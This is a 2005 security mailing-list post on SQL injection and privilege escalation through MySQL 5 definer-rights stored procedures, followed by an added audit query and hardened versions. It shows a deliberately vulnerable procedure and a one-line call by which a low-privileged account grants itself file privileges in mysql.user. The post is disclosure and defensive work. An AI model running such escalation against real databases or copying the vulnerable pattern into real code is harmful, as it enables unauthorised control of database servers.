[dbsec] MySQL 5 Stored Procedures / SQL Injection
- From: Chris Anley <chris@xxxxxxxxxxxxxxx>
- To: dbsec@xxxxxxxxxxxxx
- Date: Wed, 16 Nov 2005 17:01:15 +0000
(also posted on website)
MySQL 5 is now out, which is great; loads of new features to fiddle
with. One interesting new feature is the stored procedure mechanism,
mainly because it has the same SQL injection behaviour as Oracle -
procedures execute with 'definer' rights by default, and can contain
dynamically constructed statements. This can lead to dangerous security
flaws. To take an absurdly contrived example, this procedure:

    create procedure test.injection( s text )
    begin
        set @q = concat(" ", s);
        PREPARE stmt from @q;
        EXECUTE stmt;
    end;

...if created by 'root', will run with 'root' privileges. This means
that anyone who can execute it (say, 'low_priv', our low privileged
account) can run arbitrary SQL with root privileges, like this:

    mysql> call test.injection('update mysql.user set file_priv=''Y'' where user=''low_priv''');

So the low_priv user can grant themselves root privileges. Obviously
MySQL doesn't have any default procedures (yet), but this is something
to watch for.
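
Added example, not part of the original post: an audit query for definer-rights routines that build statements dynamically, followed by two hardened forms of the procedure above. The names test.injection_invoker, test.lookup and test.items are hypothetical.

```sql
-- Added example; test.injection_invoker, test.lookup and test.items
-- are hypothetical names used only for illustration.

-- 1. Audit: routines that run with definer rights and whose body contains
--    PREPARE. Run as an administrative account; ROUTINE_DEFINITION is NULL
--    for routines the current user is not allowed to inspect.
SELECT ROUTINE_SCHEMA, ROUTINE_NAME, DEFINER, SECURITY_TYPE
FROM information_schema.ROUTINES
WHERE SECURITY_TYPE = 'DEFINER'
  AND UPPER(ROUTINE_DEFINITION) LIKE '%PREPARE%'
ORDER BY ROUTINE_SCHEMA, ROUTINE_NAME;

DELIMITER //

-- 2. Same dynamic body, but declared SQL SECURITY INVOKER: the prepared
--    statement is checked against the caller's privileges, so low_priv
--    gains nothing it could not already do directly.
CREATE PROCEDURE test.injection_invoker( s TEXT )
SQL SECURITY INVOKER
BEGIN
    SET @q = CONCAT(' ', s);
    PREPARE stmt FROM @q;
    EXECUTE stmt;
    DEALLOCATE PREPARE stmt;
END//

-- 3. Where definer rights are really needed, keep the statement text
--    constant and pass caller input only as a bound parameter.
CREATE PROCEDURE test.lookup( item_name VARCHAR(64) )
SQL SECURITY DEFINER
BEGIN
    SET @n = item_name;
    PREPARE stmt FROM 'SELECT id, name FROM test.items WHERE name = ?';
    EXECUTE stmt USING @n;
    DEALLOCATE PREPARE stmt;
END//

DELIMITER ;
```

Any routine the audit query returns should be reviewed for caller-controlled input reaching the PREPARE text, and for who holds EXECUTE on it.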